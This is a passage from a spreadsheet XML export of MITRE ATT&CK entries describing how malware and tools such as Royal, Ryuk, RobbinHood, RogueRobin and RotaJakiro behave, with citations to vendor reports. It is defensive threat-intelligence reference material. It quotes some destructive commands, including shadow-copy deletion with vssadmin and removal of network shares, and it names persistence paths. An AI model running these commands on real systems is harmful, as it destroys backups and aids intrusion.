    <t>relationship--b9edded2-4f07-431c-bdc1-e7ba489dd253</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--ed3539fa-7ae7-45b0-9f0f-d62460ed07b1</t>
  </si>
  <si>
    <t xml:space="preserve">Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) has been encrypted using an RC4 stream algorithm.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--6bb9972b-cec8-4de0-966e-8fea90b4941c</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--8a7317fd-fa8f-4c32-8aa5-4ff225116f7e</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--dac3df5a-9569-41ac-94d2-115062b7b632</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</si>
  <si>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</si>
  <si>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relationship--5bd827b4-cdaf-4d50-acb8-493f32d51acb</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--f94c802d-62da-4689-ab35-baf9468e2423</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>relationship--2d5c711d-dcd6-4d50-b91f-1fda5311eef5</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP and HTTPS for command and control.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--7a0baa06-e3f1-4488-a0f6-ecf405413679</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) has executed commands using `cmd.exe /c “&lt;command&gt; &gt; &lt;%temp%&gt;\AM&lt;random&gt;. tmp” 2&gt;&amp;1`.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t>relationship--c1a5ba7a-659b-4ac2-90df-f3f74a3a8442</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>malware--0a607c53-df52-45da-a75d-0e53df4dad5f</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for an RSA encryption key and then perform its encryption process on the system files.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>relationship--e2fd8460-85cf-42b3-acee-7151758ee55a</t>
  </si>
  <si>
    <t>29 July 2019</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for Windows services that are associated with antivirus software on the system and kill the process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>relationship--8f16cec3-2fba-4b69-a5c5-c3eb1f185e90</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) deletes shadow copies to ensure that all the data cannot be restored easily.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>relationship--2f5583d9-e0bf-4d76-ad74-6d9bd3efa69c</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) disconnects all network shares from the computer with the command &lt;code&gt;net use * /DELETE /Y&lt;/code&gt;.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>relationship--56b6a1b5-b7ec-4974-baf1-9e4565ce5b78</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) stops 181 Windows services on the system before beginning the encryption process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>relationship--3e4f8216-03ef-4e7a-8a4a-28905fb0f474</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) uses cmd.exe on the victim's computer.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>relationship--e579ad2d-41c0-4617-8194-eefd4fe2a676</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has used Google Drive as a Command and Control channel. (Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--83bab2a0-5cbc-406e-beaf-a657ef73717d</t>
  </si>
  <si>
    <t>The PowerShell script with the [RogueRobin](https://attack.mitre.org/software/S0270) payload was obfuscated using the COMPRESS technique in `Invoke-Obfuscation`.(Citation: Unit 42 DarkHydrus July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>relationship--80bdb12e-5bf8-4f3c-aaba-185f31a7ad0a</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) decodes an embedded executable using base64 and decompresses it.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--f304b74c-85c7-4bd6-85bc-bec918a4fb7e</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) can save a new file to the system from the C2 server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--2227a2ce-2eda-4fe3-a9ca-524e0de0ded2</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</si>
  <si>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</si>
  <si>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relationship--e58abef6-2089-4f55-b5ee-9fc24378b52f</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--c29136ea-6925-4fc5-a281-b5351cef050d</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--fe86edf0-d69f-48bc-bdb7-7fd8a8dbcb82</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses regsvr32.exe to run a .sct file for execution.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--6246955e-05ae-4bd8-8ac7-c02447634486</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has a command named &lt;code&gt;$screenshot&lt;/code&gt; that may be responsible for taking screenshots of the victim machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--e769177d-17b8-443b-b939-206d724fbb40</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) enumerates running processes to search for Wireshark and Windows Sysinternals suite.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--992ffd2b-bac7-418c-a401-b2be739818c9</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--0040312a-e85d-4066-8203-2e66f8aa5288</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) base64 encodes strings that are sent to the C2 over its DNS tunnel.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--83ac6dba-c74f-4a9e-aba3-3581a67588bf</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</si>
  <si>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</si>
  <si>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relationship--93b08370-9c05-47df-b067-368343dba24a</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--d8bad886-d65a-4652-811f-f8ff9f6bb6db</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers the IP address and domain from the victim’s machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--3ab61135-89b5-4074-9251-40f41c7f739a</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) collects the victim’s username and whether that user is an admin.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--62bd74e2-ca03-4564-ae9b-75637c4c6acf</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses Windows Script Components.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--89c060ad-cec7-4ffb-85aa-8670c8dabeda</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses various WMI queries to check if the sample is running in a sandbox.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--0220b491-9c13-4bc4-a3e2-e3ad0e8c9733</t>
  </si>
  <si>
    <t>Depending on the Linux distribution, [RotaJakiro](https://attack.mitre.org/software/S1078) executes a set of commands to collect device information and sends the collected information to the C2 server.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--dd380abd-e1d8-4c8a-bd87-6e7a110fe0b4</t>
  </si>
  <si>
    <t>Depending on the Linux distribution and when executing with root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) may install persistence using a `.conf` file in the `/etc/init/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--6a1d81fb-2a8e-44d4-a827-9b0c5e41d078</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</si>
  <si>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</si>
  <si>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relationship--0924ca96-c26b-4bd1-8c50-d3c1a9e1e25b</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) sends device and other collected data back to the C2 using the established C2 channels over TCP. (Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--efcc09fb-4c15-4a58-9bc5-b92747eae842</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</si>
  <si>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</si>
  <si>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relationship--d5b2d34f-5650-4fb3-bacf-2b1765943bfe</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) has used the filename `systemd-daemon` in an attempt to appear legitimate.(Citation: netlab360 rotajakiro vs oceanlotus)</t>
  </si>
  <si>
    <t>relationship--ceadd093-d60f-452e-a145-671d010bba50</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</si>
  <si>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</si>
  <si>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relationship--3fa24e29-2791-4b10-8014-bfa817c3a2f2</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) uses a custom binary protocol using a type, length, value format over TCP.(Citation: netlab360 rotajakiro vs oceanlotus)</t>
  </si>
  <si>
    <t>relationship--b7f887ee-e0e5-4cab-9898-6dfed9b86f31</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) uses a custom binary protocol over TCP port 443.(Citation: netlab360 rotajakiro vs oceanlotus)</t>
  </si>
  <si>
    <t>relationship--af74a9b1-6c74-45b6-a21d-38686afb202c</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</si>
  <si>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</si>
  <si>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relationship--db219581-f2fc-45f9-846d-c7e6f6d238ce</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) uses dynamically linked shared libraries (`.so` files) to execute additional functionality using `dlopen()` and `dlsym()`.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--9da28d8d-5111-491a-9557-bee7004fc3a6</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) uses ZLIB Compression to compresses data sent to the C2 server in the `payload` section network communication packet.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--466ea5cf-ebe7-49da-9197-047c70cabaeb</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) encrypts C2 communication using a combination of AES, XOR, ROTATE encryption, and ZLIB compression.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--f6ae27d6-5391-467d-a25d-e4172daa963d</t>
  </si>
  <si>
    <t>[RotaJakiro](https://attack.mitre.org/software/S1078) executes a set of commands to collect device information, including `uname`.  Another example is the `cat /etc/*release | uniq` command used to collect the current OS distribution.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--87ef3b62-acb4-4cd2-86ec-36683a57bedf</t>
  </si>
  <si>
    <t>Depending on the Linux distribution and when executing with root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) may install persistence using a `.service` file under the `/lib/systemd/system/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--95954093-498a-4f5f-93b4-904632fdfbbb</t>
  </si>
  <si>
    <t>When executing with non-root level permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) can install persistence by adding a command to the .bashrc file that executes a binary in the  `${HOME}/.gvfsd/.profile/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--226961a0-998c-4402-a7de-3c7922c4b45e</t>
  </si>
  <si>
    <t>When executing with user-level permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) can install persistence using a .desktop file under the `$HOME/.config/autostart/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)</t>
  </si>
  <si>
    <t>relationship--ea61bd22-3ebc-4945-9b0a-60e65e3d4d64</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>Rover</t>
  </si>
  <si>
    <t>malware--6b616fc1-1505-48e3-8b2c-0d19337bff38</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--121a09bd-f603-4476-a149-a3cba52f268c</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</si>
  <si>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</si>
  <si>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relationship--59261bc8-0220-4e37-8018-7a3618a5dd1b</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--7c792d18-25a3-4d85-be44-93523228748c</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) searches for files on attached removable drives based on a predefined list of file extensions every five seconds.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--6d87588e-2202-4616-a536-e43a2606721b</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--e90717f3-fad2-4978-be15-7dfb647d034d</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has keylogging functionality.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--f4480854-9424-49d5-8b54-f839302e3ee7</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) copies files from removable drives to &lt;code&gt;C:\system&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--9cef6fec-e4eb-49eb-85db-880138f335bd</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) has functionality to remove Registry Run key persistence as a cleanup procedure.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--bad90106-a150-4d76-b39f-f35aab4ac766</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) persists by creating a Registry entry in &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--0f5d3626-1dc2-4ebe-ba37-3f86ab0df9ec</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) takes screenshots of the compromised system's desktop and saves them to &lt;code&gt;C:\system\screenshot.bmp&lt;/code&gt; for exfiltration every 60 minutes.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>relationship--6184b127-47cf-43fc-880b-890554d9cc9a</t>
  </si>
  <si>
    <t>S1073</t>
  </si>
  <si>
    <t>Royal</t>
  </si>
  <si>
    <t>malware--802a874d-7463-4f2a-99e3-6a1f5a919a21</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</si>
  <si>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</si>
  <si>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relationship--11e07c1f-4b28-459f-92db-ab4ebe1c5740</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can identify specific files and directories to exclude from the encryption process.(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)</t>
  </si>
  <si>
    <t>relationship--f1aa297a-1b61-4bfc-9e4b-18b4b82b4d8c</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can delete shadow copy backups with vssadmin.exe using the command `delete shadows /all /quiet`.(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: CISA Royal AA23-061A March 2023)</t>
  </si>
  <si>
    <t>relationship--5364714b-0c15-4453-9b09-7fcca3d3db01</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can use multiple APIs for discovery, communication, and execution.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--d0144271-c8e4-4cb3-b977-17b750c7193d</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can scan the network interfaces of targeted systems.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--455ad18f-00a1-4ac4-a77b-abb26a68996e</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can enumerate the shared resources of a given IP addresses using the API call `NetShareEnum`.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--855347b7-4f23-4565-8738-f21a014c75cc</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) establishes a TCP socket for C2 communication using the API `WSASocketW`.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--d942783e-906f-4d2c-963b-1cc2f8429ff1</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</si>
  <si>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</si>
  <si>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relationship--eb4bcd20-8bd2-4dd2-bbac-f784058ee9dc</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can use `GetCurrentProcess` to enumerate processes.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--f0a36615-b3eb-47d5-8a2a-9d7429643a0a</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can use SMB to connect to move laterally.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--3c1dbc6c-c608-4745-8cd2-863b4d56fabe</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can use `RmShutDown` to kill  applications and services using the resources that are targeted for encryption.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--1fe61df4-3a67-4c46-87f5-771a42323e53</t>
  </si>
  <si>
    <t xml:space="preserve"> [Royal](https://attack.mitre.org/software/S1073) can use `GetNativeSystemInfo` and `GetLogicalDrives` to enumerate system processors and logical drives.(Citation: Cybereason Royal December 2022)(Citation: Trend Micro Royal Linux ESXi February 2023)</t>
  </si>
  <si>
    <t>relationship--20f43b8b-55c7-4710-8813-6512c3b11c1a</t>
  </si>
  <si>
    <t>[Royal](https://attack.mitre.org/software/S1073) can enumerate IP addresses using `GetIpAddrTable`.(Citation: Cybereason Royal December 2022)</t>
  </si>
  <si>
    <t>relationship--857773f6-4b86-4483-8344-2331c241d472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</si>
  <si>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</si>
  <si>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relationship--865d4dac-1c58-46ed-8b86-58ec6c2633ec</t>
  </si>
  <si>
    <t>[Rubeus](https://attack.mitre.org/software/S1071) can gather information about domain trusts.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>relationship--3376df6e-0a4d-4a28-98b9-5d40ef092588</t>
  </si>
  <si>
    <t>[Rubeus](https://attack.mitre.org/software/S1071) can forge a ticket-granting ticket.(Citation: GitHub Rubeus March 2023)</t>
  </si>
  <si>
    <t>relationship--d6b24dda-b98e-44d0-913c-cb1987eba799</t>
  </si>
  <si>
    <t>[Rubeus](https://attack.mitre.org/software/S1071) can use the `KerberosRequestorSecurityToken.GetRequest` method to request kerberoastable service tickets.(Citation: GitHub Rubeus March 2023)</t>
  </si>
  <si>
    <t>relationship--0253908e-87d0-4804-994c-2ab58c3d3111</t>
  </si>
  <si>
    <t>[Rubeus](https://attack.mitre.org/software/S1071) can create silver tickets.(Citation: GitHub Rubeus March 2023)</t>
  </si>
  <si>
    <t>relationship--6a2ade56-5413-424b-9d8e-ba91267fade7</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to enumerate Exchange users and dump the GAL.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>relationship--c7c8b431-77bb-45ac-9826-bd92828c2f85</t>
  </si>
  <si>
    <t>04 February 2019</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Forms to establish persistence.(Citation: SensePost Ruler GitHub)</t>
  </si>
  <si>
    <t>relationship--66620243-f978-4038-8bf3-d574b5ce5b90</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Home Pages to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>relationship--af415c7f-b7aa-4a9e-b1a8-ae09d67070de</t>
  </si>
  <si>
    <t xml:space="preserve">[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Rules to establish persistence.(Citation: SensePost Ruler GitHub) </t>
  </si>
  <si>
    <t>relationship--066ac155-2cfd-4466-bb3a-765f3513cc8e</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>malware--60d50676-459a-47dd-92e9-a827a9fe9c58</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to compress files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--b997d866-0aef-4ba6-a812-cfa2fccb05af</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to clear event logs.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--c887c671-d467-45a1-952b-8fd20cd77ec1</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to open and copy data from the clipboard.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--d4f4974e-7918-4829-8379-5e2e98f2ae20</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) kills antimalware running process.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--0220ae6b-0dd1-434c-9bde-68ee2b045a53</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) contains code to delete files from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--83185e47-895c-4c40-8043-fbf279006873</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) captures keystrokes and sends them back to the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--5375b22d-1da8-4178-b728-5b91b6917a5c</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) adds itself to the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence upon reboot.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--7d1d4ffd-7c60-4a83-bcfa-66413bbe7212</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) gathers the OS version, logical drives information, processor information, and volume information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--b1c307de-b924-4332-b8db-3c371e46430e</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) uses a batch file to kill a security program task and then attempts to remove itself.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>relationship--4a0c3e46-f94c-48b5-b094-a8f9437857fb</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--fa049cca-da7d-4d89-ac34-cab537ce0235</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</si>
  <si>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</si>
  <si>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relationship--adbb2fb8-9a9f-4068-b123-7b557491861d</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>relationship--156ab177-474c-495c-af01-3cb9147aa703</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use stolen domain admin accounts to move laterally within a victim domain.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>relationship--561f217e-8392-40b3-84a7-29fbd1399d88</t>
  </si>
  <si>
    <t xml:space="preserve">[Ryuk](https://attack.mitre.org/software/S0446) has enumerated files and folders on all mounted drives.(Citation: CrowdStrike Ryuk January 2019)	</t>
  </si>
  <si>
    <t>relationship--2b196fe7-93e1-4575-8818-578305fc1fae</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</si>
  <si>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</si>
  <si>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relationship--3194fa27-46b8-4a05-8d3a-12d7bfe9ad15</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can create .dll files that actually contain a Rich Text File format document.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>relationship--df3548d1-800d-4d18-8566-3a5fe925a2ef</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</si>
  <si>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</si>
  <si>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relationship--5cba4a5e-c005-495d-9cd6-60794d9b3247</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</si>
  <si>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</si>
  <si>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relationship--1790f5a1-b5d5-41a4-8da0-c75ed7a23b0d</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can use anti-disassembly and code transformation obfuscation techniques.(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--06f16826-1100-4958-86e3-784a22998060</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt; to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--18d29bb2-655b-4e3d-9759-32a74be3eb75</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--afdf9b0e-5539-464a-a403-202eaedb13cd</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--e168a29f-c975-4ae9-8ab9-470bb03ae706</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used the C$ network share for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>relationship--2251345d-d828-4768-b8f0-4a4ddd8e41ca</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can remotely create a scheduled task to execute itself on a system.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>relationship--9a99890c-dea1-4ef6-8605-fd4c43f6e37c</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;kill.bat&lt;/code&gt; for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--60135ffa-b3f7-4aa8-b12e-faa2719dc5d7</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;GetLogicalDrives&lt;/code&gt; to emumerate all mounted drives, and &lt;code&gt;GetDriveTypeW&lt;/code&gt; to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--9cf32fea-16cd-41cf-93f3-a47c1388abbc</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</si>
  <si>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</si>
  <si>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relationship--4e1f3e6e-33b5-475d-b19b-d9a43227cf1c</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</si>
  <si>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</si>
  <si>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relationship--eebf12c3-1146-4daa-8fd2-c74ad19362f6</t>
  </si>
  <si>
